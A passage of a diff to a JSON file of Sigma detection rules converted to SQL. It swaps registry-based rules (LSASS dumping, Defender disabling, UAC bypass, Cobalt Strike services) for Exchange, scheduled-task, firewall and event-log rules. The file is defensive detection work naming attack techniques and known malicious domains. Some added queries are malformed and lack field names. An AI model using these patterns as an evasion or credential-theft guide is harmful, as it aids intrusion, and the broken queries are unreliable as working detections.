Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Legitimate application that needs to do a full dump of their process" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND Details = 'DWORD (0x00000002)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND logs MATCH ('\"Install-TransportAgent\"'))" ], - "filename": "registry_set_lsass_usermode_dumping.yml" + "filename": "win_exchange_transportagent.yml" }, { - "title": "Potential Persistence Via Event Viewer Events.asp", - "id": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", + "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", + "id": "9db37458-4df2-46a5-95ab-307e7f29e675", "status": "test", - "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "author": "Jose Rodriguez @Cyb3rPandaH", "tags": [ "attack.persistence", - "attack.defense_evasion", - "attack.t1112" + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionURL%' ESCAPE '\\') AND NOT ((Image LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram' ESCAPE '\\' AND Details LIKE '\\%\\%SystemRoot\\%\\%\\\\PCHealth\\\\HelpCtr\\\\Binaries\\\\HelpCtr.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgramCommandLineParameters' ESCAPE '\\' AND Details LIKE '-url hcp://services/centers/support_topic=\\%\\%s' ESCAPE '\\') OR (Details = 'http://go.microsoft.com/fwlink/events.asp') OR (Details = '(Empty)')))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" ], - "filename": "registry_set_persistence_event_viewer_events_asp.yml" + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" }, { - "title": "New File Association Using Exefile", - "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", - "status": "test", - "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Failed MSExchange Transport Agent Installation", + "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "status": "experimental", + "description": "Detects a failed installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND Details = 'exefile' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "registry_set_file_association_exefile.yml" + "filename": "win_exchange_transportagent_failed.yml" }, { - "title": "COM Hijacking via TreatAs", - "id": "dc5c24af-6995-49b2-86eb-a9ff62199e82", + "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", + "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", "status": "experimental", - "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", - "author": "frack113", + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "author": "Florian Roth (Nextron Systems), @testanull", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.lateral_movement", + "attack.t1210" ], "falsepositives": [ - "Legitimate use" + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%TreatAs\\\\(Default)' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" ], - "filename": "registry_set_treatas_persistence.yml" + "filename": "win_exchange_cve_2021_42321.yml" }, { - "title": "Registry Explorer Policy Modification", - "id": "1c3121ed-041b-4d97-a075-07f54f20fb4a", + "title": "Remove Exported Mailbox from Exchange Webserver", + "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "status": "test", - "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", - "author": "frack113", + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070" ], "falsepositives": [ - "Legitimate admin script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoLogOff' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoDesktop' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFind' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFileMenu' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoClose' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoSetTaskbar' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoPropertiesMyDocuments' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoTrayContextMenu' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" ], - "filename": "registry_set_set_nopolicies_user.yml" + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" }, { - "title": "Windows Defender Service Disabled", - "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "title": "Suspicious Application Installed", + "id": "83c161b6-ca67-4f33-8ad0-644a0737cf07", "status": "experimental", - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution" ], "falsepositives": [ - "Administrator actions" + "Packages or applications being legitimately used by users or administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND Details = 'DWORD (0x00000004)')" + "SELECT * FROM logs WHERE ((EventID = '28115' AND (Name LIKE '%Zenmap%' ESCAPE '\\' OR Name LIKE '%AnyDesk%' ESCAPE '\\' OR Name LIKE '%wireshark%' ESCAPE '\\' OR Name LIKE '%openvpn%' ESCAPE '\\')) OR (EventID = '28115' AND (AppID LIKE '%zenmap.exe%' ESCAPE '\\' OR AppID LIKE '%prokzult ad%' ESCAPE '\\' OR AppID LIKE '%wireshark%' ESCAPE '\\' OR AppID LIKE '%openvpn%' ESCAPE '\\')))" ], - "filename": "registry_set_disable_windows_defender_service.yml" + "filename": "win_shell_core_susp_packages_installed.yml" }, { - "title": "Winlogon Notify Key Logon Persistence", - "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", - "status": "test", - "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", - "author": "frack113", + "title": "Scheduled Task Executed Uncommon LOLBIN", + "id": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", + "status": "experimental", + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547.004" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%\\\\calc.exe' ESCAPE '\\' OR Path LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Path LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Path LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR Path LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Path LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Path LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "registry_set_winlogon_notify_key.yml" + "filename": "win_taskscheduler_lolbin_execution_via_task_scheduler.yml" }, { - "title": "Office Security Settings Changed", - "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", + "title": "Scheduled Task Executed From A Suspicious Location", + "id": "424273ea-7cf8-43a6-b712-375f925e481f", "status": "experimental", - "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", - "author": "Trent Liffick (@tliffick)", + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Valid Macros and/or internal documents" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_office_security.yml" + "filename": "win_taskscheduler_execution_from_susp_locations.yml" }, { - "title": "Bypass UAC Using SilentCleanup Task", - "id": "724ea201-6514-4f38-9739-e5973c34f49a", - "status": "test", - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "title": "Important Scheduled Task Deleted", + "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "status": "experimental", + "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND Details LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" + "filename": "win_taskscheduler_susp_schtasks_delete.yml" }, { - "title": "Disable Tamper Protection on Windows Defender", - "id": "93d298a1-d28f-47f1-a468-d971e7796679", - "status": "experimental", - "description": "Detects disabling Windows Defender Tamper Protection", - "author": "Austin Songer @austinsonger", + "title": "GALLIUM Artefacts - Builtin", + "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "status": "test", + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "author": "Tim Burrell", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" ], - "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml" + "filename": "win_dns_analytic_apt_gallium.yml" }, { - "title": "Disabled Windows Defender Eventlog", - "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "title": "New Firewall Rule Added In Windows Firewall Exception List", + "id": "cde0a575-7d3d-4a49-9817-b8004a7bf105", "status": "experimental", - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "description": "Detects when a rule has been added to the Windows Firewall exception list", + "author": "frack113", + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND NOT ((Action = '2') OR ((ApplicationPath LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ApplicationPath LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\Setup.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\dllhost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], + "filename": "win_firewall_as_add_rule.yml" + }, + { + "title": "New Firewall Exception Rule Added For A Suspicious Folder", + "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", + "status": "experimental", + "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", + "author": "frack113", "falsepositives": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + "Any legitimate application that runs from the AppData user directory" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND ((EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2'))) AND NOT ((ApplicationPath LIKE '%\\\\AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\')))" ], - "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" + "filename": "win_firewall_as_add_rule_susp_folder.yml" }, { - "title": "Disable Internal Tools or Feature in Registry", - "id": "e2482f8d-3443-4237-b906-cc145d87a076", + "title": "A Rule Has Been Deleted From The Windows Firewall Exception List", + "id": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", "status": "experimental", - "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "falsepositives": [ - "Legitimate admin script" - ], + "description": "Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall", + "author": "frack113", "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskmgr' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Explorer\\\\DisableNotificationCenter' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\StartMenuLogOff' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\shutdownwithoutlogon' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PushNotifications\\\\ToastEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Storage\\\\Write Protection' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\StorageDevicePolicies\\\\WriteProtect' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2006', '2052') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "registry_set_disable_function_user.yml" + "filename": "win_firewall_as_delete_rule.yml" }, { - "title": "DHCP Callout DLL Installation", - "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", - "status": "test", - "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "author": "Dimitrios Slamaris", - "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" - ], - "falsepositives": [ - "Unknown" - ], + "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", + "id": "79609c82-a488-426e-abcf-9f341a39365d", + "status": "experimental", + "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2033', '2059') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "registry_set_dhcp_calloutdll.yml" + "filename": "win_firewall_as_delete_all_rules.yml" }, { - "title": "CobaltStrike Service Installations in Registry", - "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", - "author": "Wojciech Lesicki", + "title": "Sysmon Crash", + "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "status": "experimental", + "description": "Detects application popup reporting a failure of the Sysmon service", + "author": "Tim Shelton", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((Details LIKE '%ADMIN$%' ESCAPE '\\' AND Details LIKE '%.exe%' ESCAPE '\\') OR (Details LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND Details LIKE '%start%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" ], - "filename": "registry_set_cobaltstrike_service_installs.yml" + "filename": "win_system_application_sysmon_crash.yml" }, { - "title": "Wdigest Enable UseLogonCredential", - "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", - "status": "test", - "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Important Windows Eventlog Cleared", + "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "status": "experimental", + "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 